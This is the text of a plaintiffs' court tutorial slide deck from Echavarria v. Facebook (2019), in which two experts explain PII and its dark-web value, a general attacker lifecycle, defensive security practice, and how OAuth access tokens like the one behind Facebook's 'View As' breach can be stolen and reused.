Echavarria,etal.v.Facebook,Inc.

3:18-cv-05982-WHA(andallrelatedcases)Plaintiffs’TutorialJanuary9,2019

2019–Plaintiffs’Tutorialin3:18-cv-05982-WHA(andallrelatedcases) 1

Introduction • Plaintiffs’Counsel

•  Morgan&Morgan,P.A.ComplexLitigationGroup•  CohenMilsteinSellers&TollPLLC•  MilbergTadlerPhillipsGrossmanLLP

• RetainedExperts•  MaryT.Frantzwilldiscuss:

•  PII,itsValue,andBasicSecurityAgainstHacking•  Matt.B.Strebewilldiscuss:

•  Authentication,AccessTokens,andHackingTokens

•  Somequestionsmovingforward2019–Plaintiffs’Tutorialin3:18-cv-05982-WHA(andallrelatedcases) 2

PII, Its Value, and Basic Security Against Hacking

• MaryFrantz•  Over28yearsexperienceincybersecurity,corporateenterprisetechnologyarchitecture,identityandaccessmanagement•  CEOofEnterpriseKnowledgePartners,LLC•  Hasservedasanexpertwitnessinseveraldatabreachcases•  CertifiedEthicalHacker,PenetrationTester,InformationSystemsAuditor•  CVprovidedfortheCourtandcounsel

2019–Plaintiffs’Tutorialin3:18-cv-05982-WHA(andallrelatedcases) 3

Personally Identifiable Information (PII) •  GeneralDefinitionandCaliforniaCalOPPA

•  PIIDefined(CaliforniaOnlinePrivacyProtectionAct(CalOPPA)Cal.Bus.&Prof.CodeSec.2577(a))•  DetailscollectedontheInternetaboutanindividualconsumer,includinganindividual’sfirstandlastname,aphysicalstreetaddress,anemailaddress,atelephonenumber,aSocialSecuritynumber,oranyotherinformationthatpermitsaspecificindividualtobecontactedphysicallyoronline.

•  CompromisedPIIhastwomajortypes

•  Temporaryor“changeable”information–shortshelflife•  Examples:passwords,creditcardnumbers,bankaccounts,driverslicense,email,phonenumbers

•  Historicalor”unchangeable”information–longorinfiniteshelflife•  Examples:originalimages/photos,passportnumbers,currentandpreviousaddresses,mothersmaidenname,relationships(family,contacts,challengeresponsequestions),education,birthdate,SSN,employmenthistory,earningsandnetworth,healthhistory,purchasehistory,productdesigns,onlinecomments,signeddocs

2019–Plaintiffs’Tutorialin3:18-cv-05982-WHA(andallrelatedcases) 4

PII – Value •  AggregatedProfilesorFullz

•  Fullz–complete“packages”ofinformation•  Combinationofhistoricalandtemporaryinformation

•  Highestvalue–Fullzaggregatedbehavioralandpersonalityprofiledescriptors•  Opinions,contacts,familymembers,styleandeventchoices,onlineandphysicallocationsvisited,

interests(forexample:music,movies,colors,autopurchases,andsitesvisited),“changeable”and“unchangeable”information

•  ConfidentialcorporateinformationandIP,customercomplaints,confidentialelectroniccommunication

•  ValueofPII•  Validatedand/orrecentlyupdatedFullzPII=higherstreetpriceperprofile•  Fullzishighlycovetedbynationstates,“phishers,”malicioushackers,andspammers•  Neural-marketing:theprocessofminingFullzfortargetedinfluenceandmanipulation•  CollectionandminingofFullzhasbeenusedbynationstateclandestineoperations

2019–Plaintiffs’Tutorialin3:18-cv-05982-WHA(andallrelatedcases) 5

PII – Darknet and Dark Web • Darknet

•  Systemofroutersandrelayofdevicesthatarenotindexedordirectlyaccessible•  Allcommunicationbetweentherelaysuseencryption•  CannotaccessDarknetusingstandardinternetbrowsers;mustknowexactaddressoruseDarkWebbrowsers

• DarkWeb•  AsubsetoftheDarknetthatworksoverHTML• WebservicesandspecificbrowsersrequiredtoaccessDarknet•  Builtuponanonymousbrowsing•  Specific,anonymousservicesavailable:messaging,emails,filessharingsites

2019–Plaintiffs’Tutorialin3:18-cv-05982-WHA(andallrelatedcases) 6

PII – How It is Misused

• BigdatarepositoriescreatedfromcompromisedandlegitimatePIIonDarknet•  Combinedandblendedasneeded•  Soldoffinpiecesforcontinuedrevenuestreams•  Piecessoldrarelyequatetoexactcopiesofstolendata(obfuscatessourceandtrail)•  CompleteFullzNOTusuallyfoundorsoldonDarknetauctionsites

• UseofDarkWebforsellingstolendata•  “Changeable”informationoftensoldonsalesorauctionsites;currencyisBTC•  PiecesofFullzaresoldonsalesorauctionsites

•  Usuallycopies(notoriginal),withdiminishedvalue•  CompleteFullzsalesuseprivatemessaging,secureemails,burnerphones

2019–Plaintiffs’Tutorialin3:18-cv-05982-WHA(andallrelatedcases) 7

Typical Targeting Attacker Lifecycle (not all phases are used, needed, process not linear)

Standard Attacker Lifecycle

Reconnaissance Scanning

and Penetration

Attempt Access

Establish Foothold

Establish Persistence

Exfiltrate Eliminate intrusion evidence

•  Performphysical,logicalreconnaissance(website,employees,physicalsites,etc.)

•  Usewebcrawlers/spiders,NMAP•  Vulnerabilityscan•  Registerasdeveloperandgaininsights•  Testpossiblevulnerabilities,learnfrom

errormessages/responses•  Testaccess–seewhatworks,whatdoesn’t

andwhy

•  Accessandcreate“backdoors”•  Openupports•  Harvestand/orelevatecredentials

(impersonaterealuserandserviceaccounts)

•  Root•  Deleteevidenceastheygo(advanced),

timestomp•  Exfiltrate

•  Leavebackdoors•  Deletelogs•  Maysellorshare

vulnerabilitytoscriptkiddiestocovertracks,createnoise(causechaos)

•  Comebackafternoisecalmsdownorusenoiseasacover

•  Watchforreactions,methodofremediation

High Level Hacker Lifecycle

•  Advancedattackersdonotwanttogetcaught,maximize“timeontarget”

•  “Scriptkiddies”arenotadvanced,theyoftenmakenoisethatis[sometimes]easilydetected

2019–Plaintiffs’Tutorialin3:18-cv-05982-WHA(andallrelatedcases) 8

Sample Crawl or Spider •  Usingafreetool

providedbyOWASPcalled“Zap”

•  Finds/crawlsall

URLsandcallsbeingusedbyapplicationduringeachstepofaprocess

•  Lookforexposed

informationincludingcookies,tokens,logincredentials,infrastructureinfo,etc.

2019–Plaintiffs’Tutorialin3:18-cv-05982-WHA(andallrelatedcases) 9

Typical Targeting Attacker Lifecycle (not all phases are used, needed, process not linear)

Standard Attacker Lifecycle

Defensible Posture and

Cyber Resilience

Reconnaissance Scanning

and Penetration

Attempt Access

Establish Foothold

External Threat Intelligence

Self Reconnaissance External Vulnerability Scanning

Harden/IsolateEnvironments

Logging/MonitoringInternalVulnerabilityScanning

SecureApplicationDevelopment/Testing

Third Party Assessments Threat Mitigation

Threat Remediation Bug Bounty Programs

Establish Persistence Exfiltrate

Eliminate intrusion evidence

Typical Corporate Cyber Threat Mitigation

Inform&improve

High Level Security Lifecycle

•  Emulateattacker/blackhatreconnaissancescanningandpentesting

•  Monitorthedarknetforchatteraboutattacks,datadumps

•  Monitorandlogforanomalousbehavior•  Constantvulnerabilitytestingusinglatest

signatures•  Securitytest/codereviewnewreleases,

regressiontestexistingsoftware/codeservices/web/datastores/apps/containers

•  Hardendevices/services•  Constanttraining/updating

•  PeriodiclivetestingofIRplan•  SecurityPostureAssessments•  RedTeam/BlueTeamexercises•  Thirdpartyaudits,internalaudits•  Thirdpartytestingviabugbounty

•  CorporateOwners•  CISO,ComplianceOfficer,

GeneralCounsel•  SecurityArchitecture•  SOC

2019–Plaintiffs’Tutorialin3:18-cv-05982-WHA(andallrelatedcases) 10

Securing Databases •  Generally,twotypesofdatabases–StructuredandUnstructured(No-SQL)

•  No-SQLdoesnotcontaindefaultaudittrailsandbuilt-insecurity•  Encryptingstoragemaycauseunacceptablelatency,butanorganizationcanencrypttiersbaseduponlastaccessdate,ageofdata,andotherqualifiers

•  BestpracticeNo-SQLisacombinationofthefollowing:•  Strongmulti-factorauthenticationandauthorization•  Strongperimeternetworkandisolation

•  Changedefaultports•  Segmentationofaccessrights(gateways)•  Time-basedaccesscontrols•  Disallowconcurrentaccess

•  Inputandextractvalidation•  Auditorlogallpluginaccess(trustedanduntrusted),serverlogs,andcontrolaccesstologs

•  Replicationanddatasegmentation,keystructures•  Strongencryptionwherepossible

2019–Plaintiffs’Tutorialin3:18-cv-05982-WHA(andallrelatedcases) 11

Securing Web Apps •  OWASP(OpenWebApplicationSecurityProject)

•  Globallyrecognizednon-profitforcloudsecuritybestpracticesandstandards•  Industrystandard:

•  TestfortheTop10SecurityRisksforCloudbasedapplications•  Opensourcevulnerabilityscanningsoftware•  Securitysoftwareassurancematuritymodel•  Opensourcetoolsandresources–testingtools,bestpracticecode

•  Acceptedasthestandardforweb-basedapplicationsformostorganizations•  OWASPcriticalthreatsandpenetrationtestingmethods

•  CrossSiteScripting(XSS)•  Enablesattackerstoinjectclient-sidescripts,bypassaccesscontrolssuchasthesame-originpolicy,stealvisibletokensandcookies

•  CrossSiteRequestForgery(XSRF)•  BrokenAccessControl

2019–Plaintiffs’Tutorialin3:18-cv-05982-WHA(andallrelatedcases) 12

Authentication, Access Tokens, and Hacking Tokens

• MattStrebe•  Over29yearsofexperienceinthefieldofcybersecurity,databasedesignandsecurity,securenetworkprotocols,andcryptography•  CEOofConneticITServices&CeNRGcloudhosting•  Hasservedasanexpertwitnessinseveraldatabreachcases•  Authorofnumerousbooksandpublications,includingNetworkSecurityFoundations&Firewalls24x7•  Inventor,“NoTransfer”(NOTX)patenteddeviceauthenticationprotocol•  CVprovidedfortheCourtandcounsel

2019–Plaintiffs’Tutorialin3:18-cv-05982-WHA(andallrelatedcases) 13

Authentication

•  Loggingin•  AccesstoPrivateResources•  AccessControlLists

•  SessionsandWebSessions• Websitesimultaneousaccesstomultipleresourcesinadistributedwebapplication•  AuthenticationandAuthorizationaredifferentmatters•  Here,itappearsauthenticationistheissue,notencryption•  Largescalewebapplicationstypicallyuseaccesstokenstosolvedistributedaccesscontrolissues

2019–Plaintiffs’Tutorialin3:18-cv-05982-WHA(andallrelatedcases) 14

Access Tokens •  AccessToken

•  Anaccesstokenisanobjectencapsulatingthesecurityidentityofaprocesssuchasawebsession.Atokenisusedtomakesecuritydecisionsandtostoretamper-proofinformationaboutsomesystementity.Anaccesstokenisgeneratedbybythelogonservicewhenauserlogsontothesystem

•  Bearerinstrumentexample:courtaccesskeycards•  Cancontainanythingthedeveloperwants•  AccessTokencouldbelimitedtoasinglepurpose(masterkeyv.bathroomkey)

•  TypesofTokens•  UserAccessToken(short-term,long-term)•  AppAccessToken•  RefreshToken

•  ForFacebook•  Here,itappearsthetokenFacebookassociatedwiththe“ViewAs”functiongavethehackerthesameaccessastheoriginaluser(e.g.,keycard)

2019–Plaintiffs’Tutorialin3:18-cv-05982-WHA(andallrelatedcases) 15

How Tokens are Transacted and Used •  Tokenportability(andtheftability)

•  Theyareprotected•  OnWebserversbyencryptionatrest•  IntransitovertheInternetbyencryptioninflight•  OnWebbrowsersbyencryptionatrest

•  Theyarenotnecessarilyprotectedintherunningwebbrowser• DevelopersmustbecarefulwhensendingAccessTokenstothewebbrowserclient,suchthatitappliesonlytothatuser•  Fordeveloper,aconscioustrade-offbetweensecurityandease-of-use•  Expeditedaccessrequiresconstantvigilanceuponimplementation•  Accesstokenshouldneverbeexposedtoanyotherusersinarunningbrowser

2019–Plaintiffs’Tutorialin3:18-cv-05982-WHA(andallrelatedcases) 16

2019–Plaintiffs’Tutorialin3:18-cv-05982-WHA(andallrelatedcases) 17

2019–Plaintiffs’Tutorialin3:18-cv-05982-WHA(andallrelatedcases) 18

OAuth 2.0

• OAuth2.0isanauthorizationprotocolfrequentlyusedasaneasierauthenticationprotocol•  UsedbycompanieslikeFacebook•  Theaccesstokensupplantsotherauthenticationsteps•  Allowsthird-partymarketerssomebenefits

•  Forexample:simpleuserexperiencetoprevent“usagewalls”andencourageadoption•  AdoptionofOAuth2.0

2019–Plaintiffs’Tutorialin3:18-cv-05982-WHA(andallrelatedcases) 19

OAuth 2.0 – Vulnerabilities

• ButOAuth2.0presentsagreaterriskofthe“bearerinstrument”beingmisused•  Youdon’thavetodecryptorcomprehendanAccessTokentouseit• Whenyoufindsomeoneelse’sAccessTokeninawebsession,youhavewhateverlevelofaccessthattokenpermitswithinitsexpiration•  Easeofcoding,codere-use,complexapplicationdesign,andlackoftestingleadtomistakesandincreasedriskstousers’PII

2019–Plaintiffs’Tutorialin3:18-cv-05982-WHA(andallrelatedcases) 20

How Tokens Can Be Exploited • Hackersdeterminethattheycanexploitawebsitetoobtainanotheruser’sAccessToken• Hackersaccessthewebsiteaseachuser,accessPII,thenidentifyandstealotheravailableAccessTokens• AndRepeat.Veryquickly,hackercanobtainmanymillionsofaccounts’AccessTokenswithautomatedscripts(“crawling”)• PIIistakenandinpossessionofhackersandmisusedand/orsold

2019–Plaintiffs’Tutorialin3:18-cv-05982-WHA(andallrelatedcases) 21

Preliminary Questions 1.  Howwasthe“ViewAs”tokendeveloped,securityandfunctionality

tested,priortorelease?a)  WhatprocessdidFacebookusetotestthe“ViewAs”featurepriortorelease?b)  Whereelsewas/isthetokenused?c)  WhatSecurityDevelopment(i.e.SecureSDLC)processesdoesFacebookusetotest

theirsoftwarepriortorelease?

2.  WhendidFacebookfirstdetecttheissue,andhow?3.  WhendidFacebookidentifytherootcauseoftheissue,andhow?4.  AnyreportdonebyFacebookorthird-party?5.  HowdidFacebookdeterminetheaffectedentities?6.  WhatstepsdidFacebooktaketocontainandremediatetheissue?

2019–Plaintiffs’Tutorialin3:18-cv-05982-WHA(andallrelatedcases) 22